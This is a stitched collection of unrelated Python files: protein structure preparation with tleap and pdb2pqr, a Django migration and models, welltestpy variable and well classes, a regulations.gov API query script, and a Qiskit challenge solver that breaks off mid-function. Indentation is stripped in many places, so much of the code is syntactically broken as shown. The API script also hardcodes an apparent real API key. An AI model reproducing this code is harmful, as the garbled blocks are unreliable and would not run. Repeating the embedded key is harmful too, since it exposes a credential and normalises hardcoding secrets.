"T": "THR",
"U": "SEC",
"V": "VAL",
"W": "TRP",
"Y": "TYR"
}
aa_ph_dependent = {
# R
"K" : [ 12.1, 'LYS', 'LYN'],
"H" : [ 6.04, 'HIS', 'HID'],
"E" : [ 4.15, 'GLH', 'GLU'],
"D" : [ 3.71, 'ASH', 'ASP'],
"C" : [ 8.14, 'CYS', 'CYM']
# Y
}
three_letter_seq = []
for letter in seq:
if letter in aa_ph_dependent:
if pH < aa_ph_dependent[letter][0]:
three_letter_seq.append(aa_ph_dependent[letter][1])
else:
three_letter_seq.append(aa_ph_dependent[letter][2])
else:
three_letter_seq.append(aa_map[letter])
    seq_numbers = np.arange(1, len(seq) + 1).astype(str)  # 1..N, one number per residue
# take care of termini
three_letter_seq[0] = f'{nterm}{three_letter_seq[0]}'
three_letter_seq[-1] = f'{cterm}{three_letter_seq[-1]}'
return " ".join(three_letter_seq), " ".join(seq_numbers)
def read_sequence(fname):
with open(fname, 'r') as f:
content = f.read()
    result = re.findall(r'^[A-Za-z\s]+$', content, flags=re.MULTILINE)
    sequence = ''.join(result[0].split()).upper() if result else ''
    if not sequence:
        raise ValueError(f'Could not find valid sequence in {fname}')
    non_canonical_amino_acids = re.compile('.*[BJXO].*')
    if non_canonical_amino_acids.match(sequence):
        raise ValueError('Found non-canonical amino acid (BJXO)'
                         ' in sequence. Aborting.')
return sequence
def create_pdb(sequence, output):
three_letter_seq, seq_numbers = generate_3letter_code(sequence)
output_pdb = f'{output}.pdb'
with open(f'{DIR_3DHM}/templates/tleap_load.txt', 'r') as template:
temp = template.read()
tlp = temp.replace('SEQUENCE', three_letter_seq)
tlp = tlp.replace('SEQ_NUMBERS', seq_numbers)
tlp = tlp.replace('OUTPUT', output_pdb)
tlp_file = 'tleap.in'
with open(tlp_file, 'w') as f:
f.write(tlp)
with open(f'{output}.tleap_out', 'w') as out:
return_code = subprocess.run([BIN_TLEAP, '-f', tlp_file],
stdout=out,
stderr=subprocess.STDOUT
)
return output_pdb
def generate_apbs_input(pqr, output):
size_obj = pdb2pqr.psize.Psize()
size_obj.run_psize(pqr)
input = pdb2pqr.inputgen.Input(pqr, size_obj, 'mg-auto', False, potdx=True)
input.print_input_files(output)
def run_pdb2pqr(pdb_file, output, args):
pqr_file = f'{output}.pqr'
pdb2pqr_parser = pdb2pqr.main.build_main_parser()
pdb2pqr_args = ['--apbs-input=apbs.in']
if not args.ff or args.ff == 'custom':
pdb2pqr_args += [
f'--userff={DIR_3DHM}/dat/{args.ff}.DAT',
f'--usernames={DIR_3DHM}/dat/{args.ff}.names'
]
else:
pdb2pqr_args += [f'--ff={args.ff}']
if args.neutraln:
if protonated(pdb_file):
logger.warning('File is already protonated, cannot change N-terminus')
else:
pdb2pqr_args.append('--neutraln')
if args.neutralc:
if protonated(pdb_file):
logger.warning('File is already protonated, '
'cannot change C-terminus')
else:
pdb2pqr_args.append('--neutralc')
params = pdb2pqr_parser.parse_args(
pdb2pqr_args +
[
pdb_file,
pqr_file
]
)
print(pdb2pqr_args)
# Loading topology files
definition = pdb2pqr.io.get_definitions()
pdblist, is_cif = pdb2pqr.io.get_molecule(pdb_file)
# drop water
pdblist = pdb2pqr.main.drop_water(pdblist)
# Setting up molecule
biomolecule, definition, ligand = pdb2pqr.main.setup_molecule(
pdblist, definition, None
)
# Setting termini states for biomolecule chains
biomolecule.set_termini(params.neutraln, params.neutralc)
results = pdb2pqr.main.non_trivial(
args=params,
biomolecule=biomolecule,
ligand=ligand,
definition=definition,
is_cif=is_cif,
)
pdb2pqr.main.print_pqr(
args=params,
pqr_lines=results["lines"],
header_lines=results["header"],
missing_lines=results["missed_residues"],
is_cif=is_cif,
)
if params.apbs_input:
pdb2pqr.io.dump_apbs(params.output_pqr, params.apbs_input)
# logging.basicConfig(level=20)
return pqr_file
def pqr2xyzr(pqr_file, output):
    with open(pqr_file, "r") as pqrfile_handle:
        pqrfile_content = pqrfile_handle.readlines()
xyzr_name = f'{output}.xyzr'
    re_pqr = re.compile(
        r"^ATOM\s{2}([0-9\s]{5})\s([A-Z0-9\s]{4}).([A-Z\s]{4}).([\-0-9\s]{4})"
        r".\s{3}([0-9\-\.\s]{8})([0-9\-\.\s]{8})([0-9\-\.\s]{8})\s+([0-9\.\-]+)"
        r"\s+([0-9\.\-]+)\s*$")
total_charge = 0.
xyzrfile_content = ""
res_charge = 0
old_res = 0
for line in pqrfile_content:
atom = re_pqr.match(line)
if atom:
x = float(atom.group(5))
y = float(atom.group(6))
z = float(atom.group(7))
radius = float(atom.group(9))
xyzrfile_content += "%f %f %f %f\n" % (x, y, z, radius)
# check charge
total_charge += float(atom.group(8))
res = atom.group(4)
if res != old_res:
print(f'{atom.group(4)}, {np.round(res_charge, 4)}')
res_charge = float(atom.group(8))
else:
res_charge += float(atom.group(8))
old_res = res
if np.abs(np.round(total_charge, 6)) % 1 != 0:
logger.warning(f'Total charge is not integer: {total_charge}!')
else:
logger.info(f'Total charge: {total_charge:.2f}')
    with open(xyzr_name, "w") as xyzr_file:
        xyzr_file.write(xyzrfile_content)
logger.info(f"xyzr file generated from file {pqr_file}")
return xyzr_name
def protonated(pdb_file):
with open(pdb_file, 'r') as f:
content = f.read()
    re_hydrogen = re.compile(
        r"ATOM\s{2}([0-9\s]{5})\s(H[A-Z0-9\s]{3}|\sH[A-Z0-9\s]{2}).*")
    result = re_hydrogen.findall(content)
if result:
return True
else:
return False
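# Usage sketch (hypothetical sequence): at pH 3 the acidic residue E stays
# protonated and maps to GLH instead of GLU, and the first and last residues
# receive the N-/C-terminal prefixes.
def _example_three_letter_code():
    three_letter, numbers = generate_3letter_code("GAEK", pH=3.0)
    return three_letter  # -> "NGLY ALA GLH CLYS"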
|
# Generated by Django 2.1.4 on 2019-02-03 00:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('web', '0035_auto_20190201_2156'),
('elections', '0024_auto_20190202_2353'),
]
operations = [
migrations.AddField(
model_name='debates',
name='municipality',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='web.Municipality'),
preserve_default=False,
),
]
|
# -*- coding: utf-8 -*-
"""
welltestpy subpackage providing flow datastructures for variables.
.. currentmodule:: welltestpy.data.varlib
The following classes and functions are provided
.. autosummary::
Variable
TimeVar
HeadVar
TemporalVar
CoordinatesVar
Observation
StdyObs
DrawdownObs
StdyHeadObs
TimeSeries
Well
"""
from copy import deepcopy as dcopy
import numbers
import numpy as np
from . import data_io
__all__ = [
"Variable",
"TimeVar",
"HeadVar",
"TemporalVar",
"CoordinatesVar",
"Observation",
"StdyObs",
"DrawdownObs",
"StdyHeadObs",
"TimeSeries",
"Well",
]
class Variable:
"""Class for a variable.
This is a class for a physical variable which is either a scalar or an
array.
    It has a name, a value, a symbol, a unit and a description string.
Parameters
----------
name : :class:`str`
Name of the Variable.
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Value of the Variable.
    symbol : :class:`str`, optional
        Symbol of the Variable. Default: ``"x"``
units : :class:`str`, optional
Units of the Variable. Default: ``"-"``
description : :class:`str`, optional
Description of the Variable. Default: ``"no description"``
"""
def __init__(
self, name, value, symbol="x", units="-", description="no description"
):
self.name = data_io._formstr(name)
self.__value = None
self.value = value
self.symbol = str(symbol)
self.units = str(units)
self.description = str(description)
def __call__(self, value=None):
"""Call a variable.
Here you can set a new value or you can get the value of the variable.
Parameters
----------
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`,
optional
Value of the Variable. Default: ``None``
Returns
-------
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Value of the Variable.
"""
if value is not None:
self.value = value
return self.value
@property
def info(self):
""":class:`str`: Info about the Variable."""
info = ""
info += " Variable-name: " + str(self.name) + "\n"
info += " -Value: " + str(self.value) + "\n"
info += " -Symbol: " + str(self.symbol) + "\n"
info += " -Units: " + str(self.units) + "\n"
info += " -Description: " + str(self.description) + "\n"
return info
@property
def scalar(self):
""":class:`bool`: State if the variable is of scalar type."""
return np.isscalar(self.__value)
@property
def label(self):
""":class:`str`: String containing: ``symbol in units``."""
return f"{self.symbol} in {self.units}"
@property
def value(self):
""":class:`int` or :class:`float` or :class:`numpy.ndarray`: Value."""
return self.__value
@value.setter
def value(self, value):
if issubclass(np.asanyarray(value).dtype.type, numbers.Real):
if np.ndim(np.squeeze(value)) == 0:
self.__value = float(np.squeeze(value))
else:
self.__value = np.squeeze(np.array(value, dtype=float))
elif issubclass(np.asanyarray(value).dtype.type, numbers.Integral):
if np.ndim(np.squeeze(value)) == 0:
self.__value = int(np.squeeze(value))
else:
self.__value = np.squeeze(np.array(value, dtype=int))
else:
raise ValueError("Variable: 'value' is neither integer nor float")
def __repr__(self):
"""Representation."""
return f"{self.name} {self.symbol}: {self.value} {self.units}"
def __str__(self):
"""Representation."""
return f"{self.name} {self.label}"
def save(self, path="", name=None):
"""Save a variable to file.
This writes the variable to a csv file.
Parameters
----------
path : :class:`str`, optional
Path where the variable should be saved. Default: ``""``
name : :class:`str`, optional
Name of the file. If ``None``, the name will be generated by
``"Var_"+name``. Default: ``None``
Notes
-----
The file will get the suffix ``".var"``.
"""
return data_io.save_var(self, path, name)
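# Usage sketch (hypothetical values): a Variable stores a scalar or array value;
# calling it with an argument sets a new value, calling it without returns it.
def _example_variable():
    rad = Variable("radius", 0.1, symbol="r", units="m", description="well radius")
    rad(0.2)      # set a new value
    return rad()  # -> 0.2, with rad.label == "r in m"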
class TimeVar(Variable):
"""Variable class special for time series.
Parameters
----------
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Value of the Variable.
    symbol : :class:`str`, optional
        Symbol of the Variable. Default: ``"t"``
units : :class:`str`, optional
Units of the Variable. Default: ``"s"``
description : :class:`str`, optional
Description of the Variable. Default: ``"time given in seconds"``
Notes
-----
    Here the variable should be at most 1 dimensional and the name is fixed
    to ``"time"``.
"""
def __init__(
self, value, symbol="t", units="s", description="time given in seconds"
):
super().__init__("time", value, symbol, units, description)
if np.ndim(self.value) > 1:
raise ValueError(
"TimeVar: 'time' should have at most one dimension"
)
class HeadVar(Variable):
"""
Variable class special for groundwater head.
Parameters
----------
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Value of the Variable.
    symbol : :class:`str`, optional
        Symbol of the Variable. Default: ``"h"``
units : :class:`str`, optional
Units of the Variable. Default: ``"m"``
description : :class:`str`, optional
Description of the Variable. Default: ``"head given in meters"``
Notes
-----
    Here the variable name is fixed to ``"head"``.
"""
def __init__(
self, value, symbol="h", units="m", description="head given in meters"
):
super().__init__("head", value, symbol, units, description)
class TemporalVar(Variable):
"""
Variable class for a temporal variable.
Parameters
----------
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`,
optional
Value of the Variable. Default: ``0.0``
"""
def __init__(self, value=0.0):
super().__init__("temporal", value, description="temporal variable")
class CoordinatesVar(Variable):
"""Variable class special for coordinates.
Parameters
----------
lat : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Lateral values of the coordinates.
lon : :class:`int` or :class:`float` or :class:`numpy.ndarray`
        Longitudinal values of the coordinates.
    symbol : :class:`str`, optional
        Symbol of the Variable. Default: ``"[Lat,Lon]"``
units : :class:`str`, optional
Units of the Variable. Default: ``"[deg,deg]"``
description : :class:`str`, optional
Description of the Variable. Default: ``"Coordinates given in
degree-North and degree-East"``
Notes
-----
    Here the variable name is fixed to ``"coordinates"``.
``lat`` and ``lon`` should have the same shape.
"""
def __init__(
self,
lat,
lon,
symbol="[Lat,Lon]",
units="[deg,deg]",
description="Coordinates given in degree-North and degree-East",
):
ilat = np.array(np.squeeze(lat), ndmin=1)
ilon = np.array(np.squeeze(lon), ndmin=1)
if (
len(ilat.shape) != 1
or len(ilon.shape) != 1
or ilat.shape != ilon.shape
):
raise ValueError(
"CoordinatesVar: 'lat' and 'lon' should have "
"same quantity and should be given as lists"
)
value = np.array([ilat, ilon]).T
super().__init__("coordinates", value, symbol, units, description)
class Observation:
"""
    Class for an observation.
This is a class for time-dependent observations.
It has a name and a description.
Parameters
----------
name : :class:`str`
Name of the Variable.
    observation : :class:`Variable`
        Values of the observation.
    time : :class:`Variable`, optional
        Time points of the observation. Default: ``None``
    description : :class:`str`, optional
        Description of the Observation. Default: ``"Observation"``
"""
def __init__(
self, name, observation, time=None, description="Observation"
):
self.__it = None
self.__itfinished = None
self._time = None
self._observation = None
self.name = data_io._formstr(name)
self.description = str(description)
self._setobservation(observation)
self._settime(time)
self._checkshape()
def __call__(self, observation=None, time=None):
"""Call a variable.
Here you can set a new value or you can get the value of the variable.
Parameters
----------
observation : scalar, :class:`numpy.ndarray`, :class:`Variable`, optional
New Value for observation.
Default: ``"None"``
time : scalar, :class:`numpy.ndarray`, :class:`Variable`, optional
New Value for time.
Default: ``"None"``
Returns
-------
[:class:`tuple` of] :class:`int` or :class:`float`
or :class:`numpy.ndarray`
``(time, observation)`` or ``observation``.
"""
if observation is not None:
self._setobservation(observation)
if time is not None:
self._settime(time)
if observation is not None or time is not None:
self._checkshape()
return self.value
def __repr__(self):
"""Representation."""
return f"Observation '{self.name}' {self.label}"
def __str__(self):
"""Representation."""
return self.__repr__()
@property
def labels(self):
"""[:class:`tuple` of] :class:`str`: ``symbol in units``."""
if self.state == "transient":
return self._time.label, self._observation.label
return self._observation.label
@property
def label(self):
"""[:class:`tuple` of] :class:`str`: ``symbol in units``."""
return self.labels
@property
def info(self):
"""Get information about the observation.
Here you can display information about the observation.
"""
info = ""
info += "Observation-name: " + str(self.name) + "\n"
info += " -Description: " + str(self.description) + "\n"
info += " -Kind: " + str(self.kind) + "\n"
info += " -State: " + str(self.state) + "\n"
if self.state == "transient":
info += " --- \n"
info += self._time.info + "\n"
info += " --- \n"
info += self._observation.info + "\n"
return info
@property
def value(self):
"""
Value of the Observation.
[:class:`tuple` of] :class:`int` or :class:`float`
or :class:`numpy.ndarray`
"""
if self.state == "transient":
return self.observation, self.time
return self.observation
@property
def state(self):
"""
:class:`str`: String containing state of the observation.
Either ``"steady"`` or ``"transient"``.
"""
return "steady" if self._time is None else "transient"
@property
def kind(self):
""":class:`str`: name of the observation variable."""
return self._observation.name
@property
def time(self):
"""
Time values of the observation.
:class:`int` or :class:`float` or :class:`numpy.ndarray`
"""
return self._time.value if self.state == "transient" else None
@time.setter
def time(self, time):
self._settime(time)
self._checkshape()
@time.deleter
def time(self):
self._time = None
@property
def observation(self):
"""
Observed values of the observation.
:class:`int` or :class:`float` or :class:`numpy.ndarray`
"""
return self._observation.value
@observation.setter
def observation(self, observation):
self._setobservation(observation)
self._checkshape()
@property
def units(self):
"""[:class:`tuple` of] :class:`str`: units of the observation."""
if self.state == "steady":
return self._observation.units
return f"{self._time.units}, {self._observation.units}"
def reshape(self):
"""Reshape observations to flat array."""
if self.state == "transient":
tmp = len(np.shape(self.time))
self._settime(np.reshape(self.time, -1))
shp = np.shape(self.time) + np.shape(self.observation)[tmp:]
self._setobservation(np.reshape(self.observation, shp))
def _settime(self, time):
if isinstance(time, Variable):
self._time = dcopy(time)
elif time is None:
self._time = None
elif self._time is None:
self._time = TimeVar(time)
else:
self._time(time)
def _setobservation(self, observation):
if isinstance(observation, Variable):
self._observation = dcopy(observation)
elif observation is None:
self._observation = None
else:
self._observation(observation)
def _checkshape(self):
if self.state == "transient" and (
np.shape(self.time)
!= np.shape(self.observation)[: len(np.shape(self.time))]
):
raise ValueError(
"Observation: 'observation' has a shape-mismatch with 'time'"
)
def __iter__(self):
"""Iterate over Observations."""
if self.state == "transient":
self.__it = np.nditer(self.time, flags=["multi_index"])
else:
self.__itfinished = False
return self
def __next__(self):
"""Iterate through observations."""
if self.state == "transient":
if self.__it.finished:
raise StopIteration
ret = (
self.__it[0].item(),
self.observation[self.__it.multi_index],
)
self.__it.iternext()
else:
if self.__itfinished:
raise StopIteration
ret = self.observation
self.__itfinished = True
return ret
def save(self, path="", name=None):
"""Save an observation to file.
This writes the observation to a csv file.
Parameters
----------
path : :class:`str`, optional
Path where the variable should be saved. Default: ``""``
name : :class:`str`, optional
Name of the file. If ``None``, the name will be generated by
``"Obs_"+name``. Default: ``None``
Notes
-----
The file will get the suffix ``".obs"``.
"""
return data_io.save_obs(self, path, name)
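# Usage sketch (hypothetical values): a transient Observation pairs a TimeVar
# with an observed Variable and iterates as (time, value) tuples.
def _example_observation():
    obs = Observation("drawdown", observation=HeadVar([0.0, 0.05, 0.12]),
                      time=TimeVar([0.0, 10.0, 20.0]))
    return list(obs)  # -> [(0.0, 0.0), (10.0, 0.05), (20.0, 0.12)]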
class StdyObs(Observation):
"""
Observation class special for steady observations.
Parameters
----------
name : :class:`str`
Name of the Variable.
    observation : :class:`Variable`
        Values of the steady observation.
description : :class:`str`, optional
Description of the Variable. Default: ``"Steady observation"``
"""
def __init__(self, name, observation, description="Steady observation"):
super().__init__(name, observation, None, description)
def _settime(self, time):
"""For steady observations, this raises a ``ValueError``."""
if time is not None:
raise ValueError("Observation: 'time' not allowed in steady-state")
class TimeSeries(Observation):
"""
Time series observation.
Parameters
----------
name : :class:`str`
Name of the Variable.
values : :class:`Variable`
Values of the time-series.
time : :class:`Variable`
Time points of the time-series.
description : :class:`str`, optional
Description of the Variable. Default: ``"Timeseries."``
"""
def __init__(self, name, values, time, description="Timeseries."):
if not isinstance(time, Variable):
time = TimeVar(time)
if not isinstance(values, Variable):
values = Variable(name, values, description=description)
super().__init__(name, values, time, description)
class DrawdownObs(Observation):
"""
Observation class special for drawdown observations.
Parameters
----------
name : :class:`str`
Name of the Variable.
observation : :class:`Variable`
Observation.
time : :class:`Variable`
Time points of observation.
description : :class:`str`, optional
Description of the Variable. Default: ``"Drawdown observation"``
"""
def __init__(
self, name, observation, time, description="Drawdown observation"
):
if not isinstance(time, Variable):
time = TimeVar(time)
if not isinstance(observation, Variable):
observation = HeadVar(observation)
super().__init__(name, observation, time, description)
class StdyHeadObs(Observation):
"""
Observation class special for steady drawdown observations.
Parameters
----------
name : :class:`str`
Name of the Variable.
observation : :class:`Variable`
Observation.
description : :class:`str`, optional
        Description of the Variable. Default: ``"Steady State Drawdown observation"``
"""
def __init__(
self,
name,
observation,
description="Steady State Drawdown observation",
):
if not isinstance(observation, Variable):
observation = HeadVar(observation)
super().__init__(name, observation, None, description)
def _settime(self, time):
"""For steady observations, this raises a ``ValueError``."""
if time is not None:
raise ValueError("Observation: 'time' not allowed in steady-state")
class Well:
"""Class for a pumping-/observation-well.
    This is a class for a well within an aquifer-testing campaign.
It has a name, a radius, coordinates and a depth.
Parameters
----------
name : :class:`str`
Name of the Variable.
    radius : :class:`Variable` or :class:`float`
        Inner radius of the well.
    coordinates : :class:`Variable` or :class:`numpy.ndarray`
        Coordinates of the well, given as ``[x, y]`` or a single distance value.
welldepth : :class:`Variable` or :class:`float`, optional
Depth of the well (in saturated zone). Default: 1.0
aquiferdepth : :class:`Variable` or :class:`float`, optional
Aquifer depth at the well (saturated zone). Defaults to welldepth.
Default: ``"None"``
screensize : :class:`Variable` or :class:`float`, optional
Size of the screen at the well. Defaults to 0.0.
Default: ``"None"``
Notes
-----
You can calculate the distance between two wells ``w1`` and ``w2`` by
simply calculating the difference ``w1 - w2``.
"""
def __init__(
self,
name,
radius,
coordinates,
welldepth=1.0,
aquiferdepth=None,
screensize=None,
):
self._radius = None
self._coordinates = None
self._welldepth = None
self._aquiferdepth = None
self._screensize = None
self.name = data_io._formstr(name)
self.wellradius = radius
self.coordinates = coordinates
self.welldepth = welldepth
self.aquiferdepth = aquiferdepth
self.screensize = screensize
@property
def info(self):
"""Get information about the variable.
Here you can display information about the variable.
"""
info = ""
info += "----\n"
info += "Well-name: " + str(self.name) + "\n"
info += "--\n"
info += self._radius.info + "\n"
info += self.coordinates.info + "\n"
info += self._welldepth.info + "\n"
info += self._aquiferdepth.info + "\n"
info += self._screensize.info + "\n"
info += "----\n"
return info
@property
def radius(self):
""":class:`float`: Radius of the well."""
return self._radius.value
@property
def wellradius(self):
""":class:`Variable`: Radius variable of the well."""
return self._radius
@wellradius.setter
def wellradius(self, radius):
if isinstance(radius, Variable):
self._radius = dcopy(radius)
elif self._radius is None:
self._radius = Variable(
"radius",
float(radius),
"r",
"m",
f"Inner radius of well '{self.name}'",
)
else:
self._radius(radius)
if not self._radius.scalar:
raise ValueError("Well: 'radius' needs to be scalar")
if not self.radius > 0.0:
raise ValueError("Well: 'radius' needs to be positive")
@property
def pos(self):
""":class:`numpy.ndarray`: Position of the well."""
return self._coordinates.value
@property
def coordinates(self):
""":class:`Variable`: Coordinates variable of the well."""
return self._coordinates
@coordinates.setter
def coordinates(self, coordinates):
if isinstance(coordinates, Variable):
self._coordinates = dcopy(coordinates)
elif self._coordinates is None:
self._coordinates = Variable(
"coordinates",
coordinates,
"XY",
"m",
f"coordinates of well '{self.name}'",
)
else:
self._coordinates(coordinates)
if np.shape(self.pos) != (2,) and not np.isscalar(self.pos):
raise ValueError(
"Well: 'coordinates' should be given as "
"[x,y] values or one single distance value"
)
@property
def depth(self):
""":class:`float`: Depth of the well."""
return self._welldepth.value
@property
def welldepth(self):
""":class:`Variable`: Depth variable of the well."""
return self._welldepth
@welldepth.setter
def welldepth(self, welldepth):
if isinstance(welldepth, Variable):
self._welldepth = dcopy(welldepth)
elif self._welldepth is None:
self._welldepth = Variable(
"welldepth",
float(welldepth),
"L_w",
"m",
f"depth of well '{self.name}'",
)
else:
self._welldepth(welldepth)
if not self._welldepth.scalar:
raise ValueError("Well: 'welldepth' needs to be scalar")
if not self.depth > 0.0:
raise ValueError("Well: 'welldepth' needs to be positive")
@property
def aquifer(self):
""":class:`float`: Aquifer depth at the well."""
return self._aquiferdepth.value
@property
def aquiferdepth(self):
""":class:`Variable`: Aquifer depth at the well."""
return self._aquiferdepth
@aquiferdepth.setter
def aquiferdepth(self, aquiferdepth):
if isinstance(aquiferdepth, Variable):
self._aquiferdepth = dcopy(aquiferdepth)
elif self._aquiferdepth is None:
self._aquiferdepth = Variable(
"aquiferdepth",
self.depth if aquiferdepth is None else float(aquiferdepth),
"L_a",
self.welldepth.units,
f"aquifer depth at well '{self.name}'",
)
else:
self._aquiferdepth(aquiferdepth)
if not self._aquiferdepth.scalar:
raise ValueError("Well: 'aquiferdepth' needs to be scalar")
if not self.aquifer > 0.0:
raise ValueError("Well: 'aquiferdepth' needs to be positive")
@property
def is_piezometer(self):
""":class:`bool`: Whether the well is only a standpipe piezometer."""
return np.isclose(self.screen, 0)
@property
def screen(self):
""":class:`float`: Screen size at the well."""
return self._screensize.value
@property
def screensize(self):
""":class:`Variable`: Screen size at the well."""
return self._screensize
@screensize.setter
def screensize(self, screensize):
if isinstance(screensize, Variable):
self._screensize = dcopy(screensize)
elif self._screensize is None:
self._screensize = Variable(
"screensize",
0.0 if screensize is None else float(screensize),
"L_s",
self.welldepth.units,
f"screen size at well '{self.name}'",
)
else:
self._screensize(screensize)
if not self._screensize.scalar:
raise ValueError("Well: 'screensize' needs to be scalar")
if self.screen < 0.0:
raise ValueError("Well: 'screensize' needs to be non-negative")
def distance(self, well):
"""Calculate distance to the well.
Parameters
----------
well : :class:`Well` or :class:`tuple` of :class:`float`
Coordinates to calculate the distance to or another well.
"""
if isinstance(well, Well):
return np.linalg.norm(self.pos - well.pos)
try:
return np.linalg.norm(self.pos - well)
except ValueError:
raise ValueError(
"Well: the distant-well needs to be an "
"instance of Well-class "
"or a tuple of x-y coordinates "
"or a single distance value "
"and of same coordinates-type."
)
def __repr__(self):
"""Representation."""
return f"{self.name} r={self.radius} at {self._coordinates}"
def __sub__(self, well):
"""Distance between wells."""
return self.distance(well)
def __add__(self, well):
"""Distance between wells."""
return self.distance(well)
def __and__(self, well):
"""Distance between wells."""
return self.distance(well)
def __abs__(self):
"""Distance to origin."""
return np.linalg.norm(self.pos)
def save(self, path="", name=None):
"""Save a well to file.
This writes the variable to a csv file.
Parameters
----------
path : :class:`str`, optional
Path where the variable should be saved. Default: ``""``
name : :class:`str`, optional
Name of the file. If ``None``, the name will be generated by
``"Well_"+name``. Default: ``None``
Notes
-----
The file will get the suffix ``".wel"``.
"""
return data_io.save_well(self, path, name)
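# Usage sketch (hypothetical coordinates): distances between wells can be taken
# directly via subtraction, since __sub__ delegates to Well.distance().
def _example_well_distance():
    w1 = Well("well_1", radius=0.1, coordinates=[0.0, 0.0])
    w2 = Well("well_2", radius=0.1, coordinates=[3.0, 4.0])
    return w1 - w2  # -> 5.0 (Euclidean distance in the coordinate units)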
|
"""The Perfect Python Project."""
__version__ = "0.1.0"
|
from django.db import models
from django.contrib.auth.models import User
from minions.models import Minions_status
# Create your models here.
class Groups(models.Model):
name = models.CharField(max_length=50,unique=True)
business = models.CharField(max_length=100)
informations = models.CharField(max_length=200)
enabled = models.BooleanField(default=True)
def __unicode__(self):
return self.name
class Hosts(models.Model):
#minion = models.OneToOneField(Minions_status,related_name="%(app_label)s_%(class)s_related")
minion = models.ForeignKey(Minions_status,related_name="%(app_label)s_%(class)s_related")
name = models.CharField(max_length=50,unique=True)
business = models.CharField(max_length=100)
informations = models.CharField(max_length=200)
group = models.ForeignKey(Groups,related_name="%(app_label)s_%(class)s_related")
enabled = models.BooleanField(default=True)
def __unicode__(self):
return self.name
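# Query sketch (hypothetical data, requires a configured Django project): the
# enabled hosts of a group can be fetched through the ForeignKey lookup.
def enabled_hosts(group_name):
    return Hosts.objects.filter(group__name=group_name, enabled=True)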
|
#
# https://api.data.gov/
# https://regulationsgov.github.io/developers/basics/
#
# https://stackoverflow.com/a/48030949/1832058
#
import requests
import json
import time
all_titles = ['EPA-HQ-OAR-2013-0602']
api_key = 'PB36zotwgisM02kED1vWwvf7BklqCObDGVoyssVE'
api_base='https://api.data.gov/regulations/v3/'
api_url = '{}docket.json?api_key={}&docketId='.format(api_base, api_key)
try:
for title in all_titles:
url = api_url + title
print('url:', url)
response = requests.get(url)
data = response.json()
print('--- data ---')
print(data)
print('--- keys ---')
for key in data.keys():
print('key:', key)
except Exception as ex:
print('error:', ex)
|
#!/usr/bin/env python
# coding: utf-8
# # Challenge 4c solver function for the IBM Quantum Fall Challenge 2021
# Author: Takuya Furusawa
# Score: 269940
#
# Summary of the approach:
# 1. Use the Quantum Fourier Transformation only once
# 2. Set C1 to be [0,...,0] to reduce the data_qubits
# 3. Set 1 in C2 to be 0 to reduce the data_qubits
#
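# Worked micro-example (hypothetical numbers) of steps 2 and 3 above:
#   start:  C1 = [1, 0], C2 = [3, 1], C_max = 4
#   step 2: subtract sum(C1) and the per-item C1  -> C1 = [0, 0], C2 = [2, 1], C_max = 3
#   step 3: replace the single 1 in C2 by 0       -> C2 = [2, 0], C_max -= 1 // 2 (= 0)
#   finally C_max is rounded up to 2**c - 1 = 3 (c = 2, geta = 0), so the
#   constraint test only has to inspect the data qubits above the lowest c bits.
#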
# In[2]:
import numpy as np
import math
from typing import List, Union
from qiskit import QuantumCircuit,QuantumRegister, ClassicalRegister
from qiskit.circuit import Gate
from qiskit.circuit.library.standard_gates import *
from qiskit.circuit.library import QFT
def solver_function(L1: list, L2: list, C1: list, C2: list, C_max: int) -> QuantumCircuit:
# print name and score
author = 'Takuya Furusawa'
score = 269940
print(f'{author}: {score}')
#### Make the problem easier first
C_max = C_max - sum(C1) # Reduce C_max
num_of_ones = 0
for i in range(len(C1)):
C2[i]-= C1[i] # Only the difference is important
C1[i] = 0 # Set C1 = [0,...,0]
if C2[i]==1:
C2[i]=0 # Set 1 in C2 to be 0
num_of_ones +=1 # Count the number of 1 in C2
    C_max -= int(num_of_ones/2) # subtracting 0 under-corrects and subtracting num_of_ones over-corrects, so split the difference
c = int( math.log(C_max,2) )
if not( C_max == 2**c ):
c += 1
geta = 2**c - C_max-1
C_max = 2**c-1 # Set C_max = 2**c - 1
C1[0] += geta # the difference between the original and new C_max is added
C2[0] += geta # the difference between the original and new C_max is added
# the number of qubits representing answers
index_qubits = len(L1)
# the maximum possible total cost
max_c = sum([max(l0, l1) for l0, l1 in zip(C1, C2)])
# the number of qubits representing data values can be defined using the maximum possible total cost as follows:
data_qubits = math.ceil(math.log(max_c, 2)) if not max_c & (max_c - 1) == 0 else math.ceil(math.log(max_c, 2)) + 1
### Phase Operator ###
# return part
def phase_return(index_qubits: int, gamma: float, L1: list, L2: list, to_gate=True) -> Union[Gate, QuantumCircuit]:
qr_index = QuantumRegister(index_qubits, "index")
qc = QuantumCircuit(qr_index)
threshold = 1
for i in range(index_qubits):
angle = L1[i]-L2[i]
if angle<-threshold:
qc.p(gamma*angle,i)
return qc.to_gate(label=" phase return ") if to_gate else qc
# penalty part
def subroutine_add_const(data_qubits: int, const: int, to_gate=True) -> Union[Gate, QuantumCircuit]:
qc = QuantumCircuit(data_qubits)
for i in range(data_qubits):
angle = const/(2**(data_qubits - i))
if not angle == int(angle):
qc.p(2*np.pi*angle, i)
return qc.to_gate(label=" [+"+str(const)+"] ") if to_gate else qc
# penalty part
def const_adder(data_qubits: int, const: int, to_gate=True) -> Union[Gate, QuantumCircuit]:
qr_data = QuantumRegister(data_qubits, "data")
qc = QuantumCircuit(qr_data)
qc.append(subroutine_add_const(data_qubits=data_qubits,const=const),qr_data[:]) # No QFT here
return qc.to_gate(label=" [ +" + str(const) + "] ") if to_gate else qc
# penalty part
def cost_calculation(index_qubits: int, data_qubits: int, list1: list, list2: list, to_gate = True) -> Union[Gate, QuantumCircuit]:
qr_index = QuantumRegister(index_qubits, "index")
qr_data = QuantumRegister(data_qubits, "data")
qc = QuantumCircuit(qr_index, qr_data)
threshold = 1
qc.append(QFT(data_qubits).to_gate(),qr_data) # QFT needs only here #! Added by Bo Yang
for i, (val1, val2) in enumerate(zip(list1, list2)):
if val2>threshold: ## Neglect val2=0 to save the cost
const_adder_2 = const_adder(data_qubits=data_qubits,const=val2).control(1)
